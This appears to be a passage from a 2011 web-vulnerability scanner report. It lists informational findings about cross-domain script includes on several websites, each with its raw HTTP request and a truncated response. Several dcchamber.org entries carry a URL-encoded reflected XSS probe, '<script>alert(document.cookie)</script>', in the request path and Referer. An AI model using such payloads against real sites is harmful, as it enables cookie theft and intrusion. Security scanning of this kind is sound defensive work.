Cookie: __utmz=140391216.1295459905.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/38; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=140391216.1990621908.1295459905.1295459905.1295459905.1; nvgpfl=547362597; __utmc=140391216; __utmb=140391216.5.9.1295459945750;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 19 Jan 2011 18:13:24 GMT
Content-Type: text/html
Content-Length: 39982
Last-Modified: Wed, 19 Jan 2011 18:05:14 GMT
Connection: close
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<span class="noborder"><script type="text/javascript" language="javascript" src="http://twittercounter.com/embed/?username=rafaelp"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=cYiTaGq0mr37xaadbiUzgI&s=160...=pb"></script>
...[SNIP]...
</script>
<script src="http://cdn.wibiya.com/Toolbars/dir_0009/Toolbar_9298/Loader_9298.js" type="text/javascript"></script>
<script type="text/javascript" id="navegg" src="http://lt.navegg.com/lt.js?12596"></script>
...[SNIP]...

16.20. http://rafael.adm.br/p/suas-metas-devem-ser-smart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rafael.adm.br
Path:   /p/suas-metas-devem-ser-smart/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /p/suas-metas-devem-ser-smart/ HTTP/1.1
Host: rafael.adm.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=140391216.1295459905.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/38; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=140391216.1990621908.1295459905.1295459905.1295459905.1; nvgpfl=547362597; __utmc=140391216; __utmb=140391216.5.9.1295459945750;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 19 Jan 2011 18:13:22 GMT
Content-Type: text/html
Content-Length: 30259
Last-Modified: Wed, 19 Jan 2011 18:05:08 GMT
Connection: close
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<span class="noborder"><script type="text/javascript" language="javascript" src="http://twittercounter.com/embed/?username=rafaelp"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=cYiTaGq0mr37xaadbiUzgI&s=160...=pb"></script>
...[SNIP]...
</script>
<script src="http://cdn.wibiya.com/Toolbars/dir_0009/Toolbar_9298/Loader_9298.js" type="text/javascript"></script>
<script type="text/javascript" id="navegg" src="http://lt.navegg.com/lt.js?12596"></script>
...[SNIP]...

16.21. http://twittercounter.com/rafaelp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twittercounter.com
Path:   /rafaelp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /rafaelp HTTP/1.1
Host: twittercounter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:07 GMT
Server: Apache/2.2.14 (Fedora) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20381


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
               <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
        <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</script>        
       

               <script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/2486.js"></script>
...[SNIP]...

16.22. http://web2.domainmall.com/domainserve/domainView  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web2.domainmall.com
Path:   /domainserve/domainView

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /domainserve/domainView HTTP/1.1
Host: web2.domainmall.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:15:17 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Set-Cookie: hosting_session=70cbf8156fdc673a8d3d0e60aec31ebee4ec02e9; path=/; expires=Wed, 19-Jan-2011 19:15:17 GMT
Content-Length: 44011
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/java
...[SNIP]...
<![endif]-->


<script type="text/javascript" src="http://static-vip.school9.com/images/js/pop2click.js"></script>
...[SNIP]...
<meta name="ROBOTS" content="NOINDEX,NOFOLLOW" />
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>
...[SNIP]...

16.23. http://www.addthis.com/bookmark.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:26:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
</style>
<script type="text/javascript" src="//cache.addthiscdn.com/www/q0197/js/bookmark.js"></script>
...[SNIP]...

16.24. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Content-Length: 80578
Content-Type: text/html; charset=utf-8
X-Powered-By: eZ Publish
Content-Language: en-US
Served-by:
Pragma:
Cache-Control: max-age=2959
Expires: Wed, 19 Jan 2011 16:37:01 GMT
Date: Wed, 19 Jan 2011 15:47:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- else -->

<ti
...[SNIP]...
</script>

   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=csmtechstaff"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div id="address-46e479181328b9680cd9504cbc04d4e9-7f08a1128cc5eec7cda1269c9df3d3a6">
   <script src="http://links.mkt1259.com/ui/library/formValidate.js" language="javascript"></script>
...[SNIP]...
</script>
       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script >
...[SNIP]...

16.25. http://www.dcchamber.org/chamber/memberDetail.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber/memberDetail.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber/memberDetail.asp HTTP/1.1
Host: www.dcchamber.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 19 Jan 2011 15:47:49 GMT
Server: Apache/2.0.63 (Red Hat)
Set-Cookie: PHPSESSID=r9mt7q2l6q33qih8ijabts6j75; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.26. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/cache/sql/fba/fs_1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/cache/sql/fba/fs_1.jpg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/cache/sql/fba/fs_1.jpg HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:33 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.27. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/AIR_Logo_hotsoup.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/AIR_Logo_hotsoup.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/AIR_Logo_hotsoup.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:27 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.28. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/AUlogo.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/AUlogo.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/AUlogo.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:17 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.29. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Akridge.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Akridge.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Akridge.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:27 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.30. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Cardinal.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Cardinal.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Cardinal.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:25 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.31. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Carefirst.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Carefirst.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Carefirst.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:19 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.32. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/CityPaper.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/CityPaper.png

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/CityPaper.png HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:19 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.33. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Copy%20of%20ACS%20Logo.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Copy%20of%20ACS%20Logo.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/Copy%20of%20ACS%20Logo.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:21 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js"></script>
...[SNIP]...

16.34. http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/CordiaLogo.PNG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/CordiaLogo.PNG

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/clientuploads/directory/slideshow/CordiaLogo.PNG HTTP/1.1
Host: www.dcchamber.org
Proxy-Connection: keep-alive
Referer: http://www.dcchamber.org/chamber6d392%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eceb88aaba32/memberDetail.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9np14ai9mhb0d7nsmf58cs10v7

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:52:16 GMT
Server: Apache/2.0.63 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 21331

